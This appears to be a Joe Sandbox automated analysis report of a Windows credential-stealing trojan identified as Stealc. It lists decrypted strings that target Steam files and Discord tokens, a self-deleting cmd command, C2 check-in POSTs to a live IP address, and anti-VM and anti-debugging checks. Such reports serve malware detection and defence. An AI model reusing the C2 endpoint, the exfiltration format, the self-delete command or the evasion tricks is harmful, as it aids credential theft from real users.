Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SteamPath
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \config\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ssfn*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: config.vdf
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: loginusers.vdf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_006C9030
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_006BA210
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_006B72A0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BA2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_006BA2B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_006BC920
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_006C40F0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_006BE530
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006B1710
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_006C47C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006BF7B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006C4B60
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006C3B00
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_006BDB80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_006BBE40
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_006BEE20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006BDF10

                Networking

                Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_006B62D0
                Source: unknown HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e
                Source: file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206X
                Source: file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB00D4 0_2_00AB00D4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B9C079 0_2_00B9C079
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 0_2_00B01079
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F0098 0_2_006F0098
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E2138 0_2_006E2138
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070B198 0_2_0070B198
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071E258 0_2_0071E258
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F4288 0_2_006F4288
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0073B308 0_2_0073B308
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0072D39E 0_2_0072D39E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4B431 0_2_00A4B431
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D4573 0_2_006D4573
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DE544 0_2_006DE544
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F45A8 0_2_006F45A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071D5A8 0_2_0071D5A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0072A648 0_2_0072A648
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007396FD 0_2_007396FD
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F66C8 0_2_006F66C8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070D720 0_2_0070D720
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00726799 0_2_00726799
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704868 0_2_00704868
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B098D7 0_2_00B098D7
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0482E 0_2_00B0482E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071F8D6 0_2_0071F8D6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007098B8 0_2_007098B8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070B8A8 0_2_0070B8A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00724BA8 0_2_00724BA8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00720B88 0_2_00720B88
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B83CBF 0_2_00B83CBF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B37CA8 0_2_00B37CA8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0072AC28 0_2_0072AC28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B02C4F 0_2_00B02C4F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E1D78 0_2_006E1D78
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070BD68 0_2_0070BD68
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B07DF6 0_2_00B07DF6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071AD38 0_2_0071AD38
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704DC8 0_2_00704DC8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00705DB9 0_2_00705DB9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F8E78 0_2_006F8E78
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00721EE8 0_2_00721EE8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B86F98 0_2_00B86F98
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA7F99 0_2_00AA7F99
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0CF0E 0_2_00B0CF0E
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 006B4610 appears 316 times
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe Static PE information: Section: aslwbrhj ZLIB complexity 0.9949668784288327
                Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_006C9790
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_006C3970
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\84D32R4X.htm
                Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe Static file information: File size 2118656 > 1048576
                Source: file.exe Static PE information: Raw size of aslwbrhj is bigger than: 0x100000 < 0x19a200

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.6b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aslwbrhj:EW;bqvglmea:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aslwbrhj:EW;bqvglmea:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006C9BB0
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe Static PE information: real checksum: 0x214cb8 should be: 0x20790c
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: aslwbrhj
                Source: file.exe Static PE information: section name: bqvglmea
                Source: file.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A590BE push 7B2E5044h; mov dword ptr [esp], ebx 0_2_00A590E6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B7A090 push edi; mov dword ptr [esp], ecx 0_2_00B7A0D8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B7A090 push 4171B3EAh; mov dword ptr [esp], edi 0_2_00B7A15B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C030AA push esi; mov dword ptr [esp], 49285AFCh 0_2_00C030CF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C030AA push edi; mov dword ptr [esp], eax 0_2_00C030E8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB00D4 push eax; mov dword ptr [esp], ebx 0_2_00AB0123
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB00D4 push 3D6E3655h; mov dword ptr [esp], esi 0_2_00AB01AB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB00D4 push eax; mov dword ptr [esp], ecx 0_2_00AB01C1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 1DD46DE2h; mov dword ptr [esp], ebp 0_2_00B010C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push edx; mov dword ptr [esp], ebx 0_2_00B010C9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push edi; mov dword ptr [esp], eax 0_2_00B011F1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push edx; mov dword ptr [esp], ebp 0_2_00B0129E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 69D1DF26h; mov dword ptr [esp], ebx 0_2_00B012D5
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 77F97562h; mov dword ptr [esp], edi 0_2_00B012FB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 061E190Eh; mov dword ptr [esp], ebp 0_2_00B01315
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push ebx; mov dword ptr [esp], edx 0_2_00B013F6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push eax; mov dword ptr [esp], ebx 0_2_00B0147D
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 5B0ED900h; mov dword ptr [esp], eax 0_2_00B014AB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 6D736249h; mov dword ptr [esp], edi 0_2_00B0151F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 49F9E934h; mov dword ptr [esp], eax 0_2_00B01542
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push ecx; mov dword ptr [esp], 2FD38B11h 0_2_00B0154C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 0508960Bh; mov dword ptr [esp], eax 0_2_00B01571
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 722C8053h; mov dword ptr [esp], eax 0_2_00B0158A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push eax; mov dword ptr [esp], 6DA13093h 0_2_00B0158E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push 525DC0BAh; mov dword ptr [esp], edi 0_2_00B015C4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push ecx; mov dword ptr [esp], ebx 0_2_00B015F4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push edi; mov dword ptr [esp], esi 0_2_00B01617
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push eax; mov dword ptr [esp], edx 0_2_00B016A4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push eax; mov dword ptr [esp], ebp 0_2_00B016CC
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push esi; mov dword ptr [esp], ecx 0_2_00B016D5
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01079 push edx; mov dword ptr [esp], esi 0_2_00B01703
                Source: file.exe Static PE information: section name: aslwbrhj entropy: 7.95370802823853

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-36334
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D8E8 second address: 99D8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D8EF second address: 99D908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FE784B99A2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B11FE3 second address: B12029 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE784D2BEC4h 0x00000008 jmp 00007FE784D2BEBEh 0x0000000d push ecx 0x0000000e jnc 00007FE784D2BEB6h 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE784D2BEBDh 0x0000001f jmp 00007FE784D2BEC6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05D52 second address: B05D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1112D second address: B1117A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pushad 0x00000008 ja 00007FE784D2BEB6h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FE784D2BEC8h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE784D2BEC7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1117A second address: B11184 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE784B99A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1140A second address: B11439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC2h 0x00000007 jmp 00007FE784D2BEC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B11720 second address: B11772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE784B99A38h 0x0000000a jmp 00007FE784B99A38h 0x0000000f popad 0x00000010 push edi 0x00000011 jmp 00007FE784B99A39h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B154BC second address: B154C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B154C1 second address: B154C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B154C6 second address: B154CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1552E second address: B15543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
